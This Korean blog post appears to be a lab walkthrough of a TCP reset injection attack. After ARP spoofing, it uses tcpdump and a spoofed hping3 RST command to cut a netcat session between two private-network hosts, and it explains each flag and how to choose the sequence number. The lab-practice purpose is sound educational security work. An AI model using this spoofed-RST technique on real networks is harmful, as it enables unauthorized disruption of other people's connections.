뭔소리냐면
A(10.200.181.5) 와 B(10.200.181.6, nc서버)이 서로 nc으로 통신하고 있음.
그 사이 kali가 껴서 A를 끊어버릴 것이다. 어떻게 해야 할까?
1. ARP 스푸핑
이전 게시글에서 했었다.
자세한 설명은 생략한다.
2. 칼리에서 tcpdump를 켠다
tcpdump -S -n port 4000
3. B에서 nc 통해 포트를 오픈한다. 그리고 A가 연결해서 몇마디 나눠보셈
4. tcpdump 확인.
5. 나는 10.200.181.5의 연결을 끊을 것이다.
hping3 -s 4000 -a 10.200.181.6 -p 60378 -M 2680635114 -L 0 -R -c 1 10.200.181.5
[-s]: 출발지 port
[-p]: 목적지 포트
[-a]: 스푸핑할 ip
[-M]: sequence number
[-L]: ACK number. RST 날릴거라 이거 필요없음
[-R]: RST 플래그
[-c]: 보낼 패킷 수
10.200.181.6이 10.200.181.5에게 RST 날린 것처럼 유도하는 것임.
여기서 sequence number는 10.200.181.5가 10.200.181.6으로 보낸 가장 최신 패킷의 ack number를 써주면 된다.
결과
10.200.181.5가 억울하게 연결이 끊긴 것이 보이는가?
그럼 성공했다.
'보안 > 인프라' 카테고리의 다른 글
| UTM Oversubscription (0) | 2022.07.31 |
|---|---|
| 네트워크 보안 제품 구성 모드 (In-line, Mirroring, Proxy) (0) | 2022.07.30 |
| Slow-Rate: Slowloris 공격 실습 (1) | 2022.07.08 |
| Slow-Rate: TorsHammer 공격 실습 (0) | 2022.07.08 |
| PPS based Flooding (TCP Flag) (0) | 2022.07.08 |